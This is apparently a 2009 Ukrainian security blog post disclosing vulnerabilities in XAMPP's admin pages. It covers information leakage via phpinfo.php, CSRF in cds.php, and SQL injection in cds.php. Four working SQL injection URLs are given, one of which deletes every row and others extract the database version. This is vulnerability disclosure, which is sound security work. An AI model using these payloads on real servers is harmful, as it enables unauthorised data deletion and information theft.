20.06.2009
У червні, 11.06.2009, а також додатково сьогодні, я знайшов Information Leakage, Cross-Site Request Forgery та SQL Injection уразливості в XAMPP. Про що найближчим часом сповіщу розробникам.
Раніше я вже писав про уразливості в XAMPP.
Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам системи.
25.07.2009
Information Leakage:
http://site/xampp/phpinfo.php
При доступі в адмінку (через Insufficient Authorization уразливості) можна отримати багато інформації про систему.
CSRF:
http://site/xampp/cds.php
Можна видаляти та додавати дані в тестовій таблиці (як через CSRF, так і через Insufficient Authorization уразливості). А також проводити SQL Injection через CSRF атаки.
SQL Injection:
http://site/xampp/cds.php?action=del&id=-1%20or%201=1
http://site/xampp/cds.php?interpret=1&titel=1&jahr=1),(version(),1,1
http://site/xampp/cds.php?interpret=1&titel=’,1,1),(version(),1,1)/* (mq off)
http://site/xampp/cds.php?titel=1&interpret=’,1),(version(),1,1)/* (mq off)
Атака можлива при доступі в адмінку (через Insufficient Authorization), або через CSRF.
Уразливі XAMPP 1.6.8 та попередні версії. Та потенційно наступні версії (включно з останньою версією XAMPP 1.7.1).